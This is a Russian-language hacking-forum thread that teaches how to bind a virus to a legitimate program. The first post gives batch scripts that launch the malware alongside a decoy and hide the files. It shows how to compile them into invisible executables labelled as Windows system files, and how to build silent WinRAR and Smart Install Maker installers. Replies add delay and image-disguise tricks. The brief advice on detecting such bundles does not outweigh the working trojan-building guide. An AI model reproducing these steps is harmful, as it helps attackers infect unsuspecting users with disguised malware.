Инструкция взлома - Это пособия для безопасности!

Объявление

Hash Profit

Хочешь получить WMR бонус? Вот несколько рабочих WMR бонус программ, которые раздают бонусы за посещение их сайтов по 0.77 р., мало но каждый день что стоит кликать на кнопку и получать свой бонус, сколько накапает к примеру за месяц, за год?
worldwm
5-kopeek
icqmir
1 клик 1 wmr
3.03WMB

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Инструкция взлома - Это пособия для безопасности! » Всё что касается вирусов. » Как склеивают вирусы с программами.


Как склеивают вирусы с программами.

Сообщений 1 страница 26 из 26

1

Доброго времени суток!
На самом деле очень много способов склеить вирус с программой,да и ещё так что потом не отличишь от оригинала,или же почти не отличишь.
В этой статья я опишу пару самых распространённых способов склеивания вируса с программой и попробую написать как можно распознать подделку.
И так начнём наверное самого простого и самого ламерского способа склеивания вируса при помощи архиватора WinRar ;) 
Допустим у нас есть пара файлов которых нужно склеить вместе,это наш вирус virus.exe и программа с которой он будет склеиваться soft.exe
Для начала напишем батинок( текстовый файл содержащий в себе команды командной строки Windows с расширением .bat),который будет запускать оба файла,тем самым создавая вид что устанавливается простая программа и в то же время будет работать вирус.

Код:
@echo off 
start virus.exe >nul 
start soft.exe >nul 
attrib +s +h +r +a %Systemroot%\virus.exe >nul 
attrib +s +h +r +a %Systemroot%\soft.exe >nul 
attrib +s +h +r +a %Systemroot%\(имя вашего батинка).exe >nul 
exit

Теперь распишу каждую строку в отдельности   
@echo off - скрывает тело батинка
>nul - скрывает вывод результата об произведенной операции указанной команды (в прицепе он не обязателен так же как и @echo off,по тому что батинок будет компилироваться в exe,при помощи Bat to exe converter (скачать) и получится отдельная программа без всяких окон командной строки в ходе работы батинка. )
start virus.exe - запускает наш вирус с именем virus.exe
start soft.exe - запускает программу для отвода глаза с именем soft.exe
attrib +s +h +r +a %Systemroot%\virus.exe >nul - прячет от глаз при просмотре в обычной оболочке стандартного проводника(explorer) папки Windows,наш вирус с именем virus.exe
attrib +s +h +r +a %Systemroot%\soft.exe >nul - выполняет тоже самое,но для программы с именем soft.exe
attrib +s +h +r +a %Systemroot%\(имя вашего батинка).exe >nul - тут вы укажите собственно имя самого батинка в котором и будет это всё содержаться.
exit - завершает выполнение батинка и выходит .
Имена вируса и программы можно менять на какие угодно но указывать файлы в командах нужно с расширением.
%Systemroot% - можно сменить или во все убрать,тут всё будет зависеть от того куда будут выгружать файлы,в этом случае файлы должны выгружать в папку Windows и только,в противном случае,они не будут прятаться.
Таким батинком можно запускать одновременно сколько угодно вирусов и программ,просто добавляя новые строки с именами и командами.
Допустим у нас три вируса и одна программа,тогда наш батинок будет выглядеть вот так:

Код:
@echo off 
start virus1.exe >nul 
start virus2.exe >nul
start virus3.exe >nul
start soft.exe >nul 
attrib +s +h +r +a %Systemroot%\virus1.exe >nul 
attrib +s +h +r +a %Systemroot%\virus2.exe >nul
attrib +s +h +r +a %Systemroot%\virus3.exe >nul
attrib +s +h +r +a %Systemroot%\soft.exe >nul 
attrib +s +h +r +a %Systemroot%\(имя вашего батинка).exe >nul 
exit

Надеюсь всё понятно  :D если что то не понятно,можете посетить наш Онлайн справочник по командной строке Windows.
Создаём пустой текстовый файл,вписываем в него нужные команды и сохраняем с расширением .bat,далее компилируем его в .exe для того чтоб при работе самого батинка не выскакивало ни каких окошек командной строки Windows.В сети полно компиляторов которые позволяют компилировать файлы bat в exe,мы будем использовать (как я упоминал выше ) Bat to exe converter (скачать)
Запускам его и сразу на первой вкладке выбираем опцию на Invisible application
http://i2.pixs.ru/storage/4/2/8/konverter1_8362915_2475428.png

Далее переходим на вкладку Versioninformations и указываем все данные.

http://i.pixs.ru/storage/4/3/2/konverter2_7737481_2475432.png

Так как многие антивирусы реагируют на файлы в которых не указаны описание к файлу,я добавил описание системного файла Windows,так что если даже и антивирус или файервол выдаст оповещение о запуске такого файла он все равно будет подписан как системный и юзверь в большинстве случаев даёт разрешение на выполнения такого файла,тупа приняв его за системный.
После того как батинок скомпилирован в exe и всё нужные файлы у нас есть,перейдём к процедуре склеивания всех файлов в один при помощи архиватора WinRar создавая само распаковывающийся архив SFX.Если у вас не установлен ещё архиватор WinRar (скачать) советую установить,так как без него ни чего не получится,да и вообще нужная программа которая во многом будет полезна.
Выделяем нужные нам файлы,нажимаем на них правой кнопкой мыши и добавляем в архив
http://i2.pixs.ru/storage/5/0/5/1png_5901260_2475505.png
Дальше делаем точно так же как и на скрине
http://i.pixs.ru/storage/5/2/2/2png_2136026_2475522.png
Указываем имя программы под которую будет маскироваться наш вирус( и под которым будет создан сам архив)
Ставим галки на "Создать SFX-Архив" и "Протестировать файлы после упаковки"
Выбираем метод сжатия ( для того чтоб получить как можно меньше размер конечного файла) лучше максимальный и переходим на вкладку "Дополнительно"
http://i.pixs.ru/storage/5/4/0/3png_4970380_2475540.png
Нажимаем на кнопку "Параметры SFX..."
http://i.pixs.ru/storage/5/5/0/4png_8336475_2475550.png
Указываем путь для распаковки и имя скомпилированного батинка (с расширением) который будет запускать вирус и программу одновременно (я назвал его services.exe),после переходим на вкладку "Обновление"
http://i.pixs.ru/storage/5/7/7/5png_7824332_2475577.png
Указываем в опциях "Режима обновления" - "Извлечь и обновить" и в опциях "Режим перезаписи" - "Перезаписывать все файлы без запросов"
После переходим на вкладку "Режимы" и в опциях указываем "Скрыть всё"
http://i.pixs.ru/storage/6/7/3/6png_2904977_2475673.png
И переходим на вкладку "Текст и графика" для того чтоб присвоить к архиву иконку.
http://i2.pixs.ru/storage/7/1/5/7png_5901697_2475715.png
В итоге мы получаем исполняемый файл,который при запуске запустить вирус и программу,тем самым вирус выполнит свою чёрную работу прикрываясь реальной программой.

Теперь перейдём к менее распространённому и не много более хитрому и скрытому способу склеивания вируса при помощи программы Smart Install Maker

Для начала устанавливаем Smart Install Maker (скачать)  и активируем его:

http://i.pixs.ru/storage/9/4/7/1png_1566440_2183947.png
http://i.pixs.ru/storage/9/7/3/2png_1974831_2183973.png

И начинаем клеить вируса с программой  :)
Первая вкладка Информация,указываем имя программы,версию,компанию изготовителя,имя исходного файла и куда его создать:
http://i.pixs.ru/storage/9/9/3/3png_3968917_2183993.png

Далее переходим на вкладку файлы и жмякаем плюс:
http://i.pixs.ru/storage/0/1/3/4png_7444037_2184013.png

Добавляем файлы сколько нужно и указываем куда выгрузить:

http://i.pixs.ru/storage/0/3/9/5png_8159656_2184039.png
http://i.pixs.ru/storage/0/4/7/6png_4058118_2184047.png

После того как добавили все необходимые файлы переходим в вкладку Диалоги и ставим галку на скрытую установку:
http://i.pixs.ru/storage/0/6/3/7png_2045523_2184063.png

Дальше вкладка Интерфейс, присваиваем иконку:
http://i.pixs.ru/storage/0/7/0/8png_5794065_2184070.png

Вкладка Команды указываем какие файлы,как и когда нужно запустить.:
http://i.pixs.ru/storage/1/0/1/9png_3684918_2184101.png
http://i.pixs.ru/storage/1/1/5/10png_3853757_2184115.png

Переходим в раздел Деинсталлятор,вкладка настройки,убираем галку с создать деинсталлятор(ибо он нам не нужен) и жмякаем кнопку Компилировать:
http://i.pixs.ru/storage/1/2/9/11png_2042931_2184129.png
http://i.pixs.ru/storage/1/3/5/12png_7762731_2184135.png
В итоге получаем исполняемый файл,который запустит одновременно и программу и вирус без каких либо батинков.
Да и так же файлов в таком архиве может быть сколько угодно.

Для того чтобы Распознать программу склееную при помощи архиватора WinRar достаточно нажать правой кнопкой мыши на файле,если он упакован при помощи архиватора то вы увидите вот такую картинку в контекстном меню:
http://i.pixs.ru/storage/8/3/3/Snimok6png_8659430_2475833.png
Выберите пункт "Открыть в WinRar" и Вы сможете увидеть всё содержимое файла,сценарий выполнения архива и так же сможете ивзлечь всё что нужно без запуска архива и каких либо файлов из него,при помощи пункта "Извлечь без подтверждения "
А вот чтоб распознать программу склееную при помощи программы Smart Install Maker потребуется уже не много больше усилий.
Во первых признак склейки этой программой можно увидеть в свойствах программы,а точней в её описание,тип как то так:
http://i.pixs.ru/storage/1/1/5/Snimok8png_7133788_2477115.png
В конце "Описание" программы будет добавляться слово "Installation",ну эт только так маленькая подсказка.
На самом деле это слово может подставляться не только при склейки с помощью этой программы,ну так же может добавляться при упаковывание других подобных программ,так что тут только маленькая подсказка.
Чтоб полностью убедится в том что программа была создана или же склеена при помощи Smart Install Maker,достаточно воспользоваться программой Resource Haker (скачать) ,это довольно полезная программа которая очень легка в использование и при помощи которой можно много чего сделать,ну сейчас речь не о ней.
И так берём файл который нас интересует и перетягиваем его в программу Resource Haker
http://i.pixs.ru/storage/1/9/0/Snimok9png_5016730_2477190.png
И вот мы в строке "<description>Smart Install Maker - create setup software</description>" отчётливо видим название программы которой был упакован архив.
Но опять же это не всегда,более продвинутые убирают эту паливную надпись,да и не только её.
Так же могу посоветовать установить вам на компьютер VirtualBox и все файлы и программы которые были скачены с подозрительных ресурсов прежде всего запускать там,так воспользовавшись какой нибудь программой которая позволяет делать Portable версии программ,например Thinstall Virtualization Suite 3.387 Portable (скачать),(пример её использования я опишу в другой статье не много позже) так же каждый файл перед установкой распаковывать (без запуска) при помощи Universal Extractor (скачать)  это тоже очень полезная утилита,да при помощи её можно распаковать файлы упакованные при помощи InoSetup а многие пользуются ей для склеивания вирусов с программами.
Все программы указанные в статье,Вы можете скачать абсолютно бесплатно с нашего ресурса,без ожидания,по прямым ссылкам и без каких либо вирусов!
На этом я думаю можно закончить данную статью,если же Вам будет что либо не понятно или же Вы захотите узнать о других методах упаковки и склеивания вирусов,не стесняйтесь задавайте вопросы,мы всегда будем рады Вам на них ответить.
Спасибо за внимание,всего доброго!

0

2

MOssWar написал(а):

Код:

@echo off
start virus.exe >nul
start soft.exe >nul
attrib +s +h +r +a %Systemroot%\virus.exe >nul
attrib +s +h +r +a %Systemroot%\soft.exe >nul
attrib +s +h +r +a %Systemroot%\(имя вашего батинка).exe >nul
exit

хотел спросить можно ли сделать так чтобы сперва запустилась программа virus.exe а например через 15 секунд запустилась программа soft.exe?

0

3

Almaz88 да так то можно,воткни туда ping
тип

Код:
@echo off 
start virus.exe >nul 
ping -n 15 ya.ru
start soft.exe >nul 
attrib +s +h +r +a %Systemroot%\virus.exe >nul 
attrib +s +h +r +a %Systemroot%\soft.exe >nul 
attrib +s +h +r +a %Systemroot%\(имя вашего батинка).exe >nul 
exit

Или как нить тип так.

0

4

ОООО боже!!!! зачем парится:?  скачайте Joiner и всё

0

5

Edemskiy22142 написал(а):

зачем парится:?

а че тут парится??? делов то на 2 минуты!

0

6

Edemskiy22142 юзай джойнеры)))

0

7

horosh sposob  https://forumupload.ru/uploads/000f/db/02/1751-4.gif

0

8

+++

0

9

=)  https://forumupload.ru/uploads/000f/db/02/1751-4.gif

0

10

не флудите мля!!! https://forumupload.ru/uploads/000f/db/02/1734-4.gif

0

11

о пригодилось! https://forumupload.ru/uploads/000f/db/02/1750-3.gif

0

12

о спасибо давно искал

0

13

а подскажите ктото плиз, как соеденить exe с вирусом в формате vbs?

0

14

Так как всё таки чётко отличить архив с виросом от нормального?
Может есть какие то напутствия?

0

15

MOssWar
А когда я начну эксперементировать на своём комне,как потом мне удалить вирус?

0

16

Kash написал(а):

Так как всё таки чётко отличить архив с виросом от нормального?
Может есть какие то напутствия?

Чё за тупизм?
Открой архив в WinRar и смотри что там внутри.

Kash написал(а):

А когда я начну эксперементировать на своём комне,как потом мне удалить вирус?

Установка виртуальной машины
Да и потом ни чего серьёзного ты не в силах сделать,а всё что ты сможешь сделать,можно откатить восстановлением системы,разумеется сначала создав точку восстановления.

0

17

Привет всем нашел прогу которая кидает вирус жертве! Для етого нада скайп или айпи жертывы
Вот ссылка на скачку =)
https://forumupload.ru/uploads/000f/db/02/1750-3.gif
________________________________________
Комментарий Администратора.
Перед повторной регистрацией с правилами форума ознакомься.

0

18

Очень грамотное я бы даже сказал Джойня )) говорят не легче с джойнерам ?? а если у тебя нет бабЛа на приватный джойнер.. а с паблика все палятся ?!!! считаю это самый актуальный джойн для новичков да и не только ) а так  Smart Install Maker'ом дружу довольно долго

0

19

А можно ли вирус прикрепить к фотографии или к рисунку какому нибудь?

0

20

Lex написал(а):

А можно ли вирус прикрепить к фотографии или к рисунку какому нибудь?

не понел?что бы с расширение jpg был или при запуске открывалась фотография?

0

21

hd4870 написал(а):

не понел?что бы с расширение jpg был или при запуске открывалась фотография?

чтоб при запуске фотка открывалась

0

22

добавь в батинок start image.jpg

0

23

Вроде бы все праильно сделал тока у меня архиватор немногодругой не такой как на видио!все готовый архив скин на рабочий стол нажимаю на него он просит разорхивировать это так и надо? https://forumupload.ru/uploads/000f/db/02/1750-2.gif

0

24

А ЧЁ его протестировать можно??? https://forumupload.ru/uploads/000f/db/02/1754-3.gif

0

25

Санёк нет нельзя! даже не пытайся!

0

26

Вопросик: какой командой запустить вирусняк в SYSTEM SERVICE MODE?

0


Вы здесь » Инструкция взлома - Это пособия для безопасности! » Всё что касается вирусов. » Как склеивают вирусы с программами.